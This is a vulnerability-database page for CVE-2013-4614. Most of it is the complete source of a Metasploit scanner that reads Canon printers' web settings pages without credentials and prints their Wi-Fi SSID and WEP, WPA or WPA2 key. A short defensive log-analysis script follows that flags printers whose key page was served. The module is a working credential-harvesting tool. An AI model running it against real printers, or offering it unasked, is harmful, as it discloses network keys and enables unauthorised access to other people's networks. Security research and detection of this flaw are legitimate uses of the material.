Canon Printer Wireless Configuration Disclosure

Published: 27 May 2013 22:02:37
Reported by: Matt "hostess" Andreko
Type: metasploit
Source: www.rapid7.com
Views: 39

This module enumerates wireless credentials from Canon printers with a web interface. It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870, MX890, MX920. The module checks LAN settings and wireless key configuration.

Related

Reporter | Title | Published | Family
Tenable Nessus | Canon PIXMA Printer WLAN Credential Disclosure | 7 Apr 2014 00:00 | nessus
Circl | CVE-2013-4614 | 29 May 2018 15:50 | circl
CVE | CVE-2013-4614 | 21 Jun 2013 21:00 | cve
Cvelist | CVE-2013-4614 | 21 Jun 2013 21:00 | cvelist
EUVD | EUVD-2013-4470 | 7 Oct 2025 00:30 | euvd
NVD | CVE-2013-4614 | 21 Jun 2013 21:55 | nvd
OpenVAS | Canon Printer Multiple Vulnerabilities (Jun 2013) - Active Check | 19 Jun 2013 00:00 | openvas
Packet Storm | Canon Printer DoS / Secret Disclosure | 18 Jun 2013 00:00 | packetstorm
Packet Storm | Canon Printer Wireless Configuration Disclosure | 1 Sep 2024 00:00 | packetstorm
Prion | Design/Logic Flaw | 21 Jun 2013 21:55 | prion

Code

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'nokogiri'

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Canon Printer Wireless Configuration Disclosure',
      'Description'    => %q{
          This module enumerates wireless credentials from Canon printers with a web interface.
          It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870,
          MX890, MX920.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
        ],
      'References'     => [
        [ 'CVE', '2013-4614' ],
        [ 'OSVDB', '94417' ],
        [ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
      ],
      'DisclosureDate' => '2013-06-18'))
  end

  def get_network_settings
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => '/English/pages_MacUS/lan_set_content.html',
      })
    rescue
      print_error("#{rhost}:#{rport} Could not connect.")
      return
    end

    if res
      if res.code == 200

        html = Nokogiri::HTML(res.body)

        checked_lan_setting = html.xpath '//input[@name="LAN_OPT1" and @checked]'

        if checked_lan_setting.count == 1
          lan_setting = ''
          ssid = ''
          case checked_lan_setting[0]['value']
          when '0'
            lan_setting = 'Do not use LAN'
          when '1'
            lan_setting = 'Use wired LAN'
          when '2'
            lan_setting = 'Use wireless LAN'

            ssid_input = html.xpath '//input[@name="LAN_TXT1"]'
            ssid = ssid_input[0]['value'] if ssid_input.count == 1
          end

          return lan_setting, ssid
        else
          print_error("#{rhost}:#{rport} Could not determine LAN Settings.")
        end

      elsif res.code == 401
        print_error("#{rhost}:#{rport} Authentication failed")
      elsif res.code == 404
        print_error("#{rhost}:#{rport} File not found")
      end
    end
  end

  def get_wireless_key
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => "/English/pages_MacUS/wls_set_content.html",
      })
    rescue
      # `ip` is not in scope in this method; use rhost as the other handlers do
      print_error("#{rhost}:#{rport} Could not connect.")
      return
    end

    if res
      if res.code == 200
        html = Nokogiri::HTML(res.body)
        encryption_setting = ''
        encryption_key = ''

        checked_encryption_setting = html.xpath '//input[@name="WLS_OPT1" and @checked]'
        case checked_encryption_setting[0]['value']
        when '0'
          encryption_setting = 'None'
        when '1'
          encryption_setting = 'WEP'
          wep_key_inputs = html.xpath '//input[starts-with(@name, "WLS_TXT1") and not(@value="")]'
          encryption_key = wep_key_inputs.collect{|x| x['value']}.join(', ')
        when '2'
          encryption_setting = 'WPA'
          wpa_key_input = html.xpath '//input[@name="WLS_TXT2"]'
          encryption_key = wpa_key_input[0]['value']
        when '3'
          encryption_setting = 'WPA2'
          wpa2_key_input = html.xpath '//input[@name="WLS_TXT3"]'
          encryption_key = wpa2_key_input[0]['value']
        end

        return encryption_setting, encryption_key

      elsif res.code == 401
        print_error("#{rhost}:#{rport} Authentication failed")
      elsif res.code == 404
        print_error("#{rhost}:#{rport} File not found")
      end
    end
  end

  def run_host(ip)

    ns = get_network_settings
    return if ns.nil?

    good_string = "#{rhost}:#{rport} Option: #{ns[0]}"
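    if ns[0] == 'Use wireless LAN'
      wireless_key = get_wireless_key
      # get_wireless_key returns nil on a connection error or a non-200 response
      unless wireless_key.nil?
        good_string += "\tSSID: #{ns[1]}\tEncryption Type: #{wireless_key[0]}\tKey: #{wireless_key[1]}"
      end
    end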

    report_note({
      :data => good_string,
      :type => 'canon.wireless',
      :host => ip,
      :port => rport
    })

    print_good good_string

  end
end
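
A defender-side companion to the listing above, as an added example that is not part of the Metasploit module or the original page: it scans proxy or gateway logs for requests to the two pages the module reads and lists printers whose wireless key page was served, so their Wi-Fi key can be treated as disclosed. The log format, the `admin_hosts` parameter and every sample line are constructed assumptions.

```ruby
require 'set'

# The two pages requested by the module in the listing above.
LAN_PAGE = '/English/pages_MacUS/lan_set_content.html'
WLS_PAGE = '/English/pages_MacUS/wls_set_content.html'

# Assumed log format: "<client> <printer> <METHOD> <uri> <status>"
LINE_RE = /\A(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d{3})\z/

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = <<~LOG
  10.0.5.23 192.168.1.40 GET /English/pages_MacUS/lan_set_content.html 200
  10.0.5.23 192.168.1.40 GET /English/pages_MacUS/wls_set_content.html 200
  10.0.5.23 192.168.1.41 GET /English/pages_MacUS/lan_set_content.html 401
  192.168.1.10 192.168.1.40 GET /index.html 200
  192.168.1.77 192.168.1.42 GET /english/pages_macus/wls_set_content.html?x=1 200
  garbage line
LOG

# Returns every request for the two pages from a host outside admin_hosts,
# plus the printers that answered 200 for the wireless key page.
def analyze(log, admin_hosts: Set.new)
  pages  = { LAN_PAGE.downcase => :lan, WLS_PAGE.downcase => :wls }
  served = Hash.new { |h, k| h[k] = Set.new } # [client, printer] => pages answered 200
  findings = []
  log.each_line do |line|
    m = LINE_RE.match(line.strip)
    next unless m # skip lines that do not parse
    client, printer, _method, uri, status = m.captures
    # Drop the query string and fold case so trivial variations still match.
    page = pages[uri.split('?', 2).first.to_s.downcase]
    next if page.nil? || admin_hosts.include?(client)

    kind = if status != '200'
             :probe
           elsif page == :wls
             :key_page_served
           else
             :lan_page_served
           end
    served[[client, printer]] << page if status == '200'
    findings << { client: client, printer: printer, kind: kind }
  end
  rotate = served.select { |_, pg| pg.include?(:wls) }.keys.map(&:last).uniq
  { findings: findings, rotate_key_for: rotate }
end

puts analyze(SAMPLE_LOG).inspect if __FILE__ == $PROGRAM_NAME
```

A printer that appears in `rotate_key_for` returned the wireless settings page with status 200, which on the affected models means the key was in the response body.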

Last updated: 16 Feb 2022 23:22 (Current)
Vulners AI Score: 7 (High risk)
CVSS 2: 2.1
EPSS: 0.08011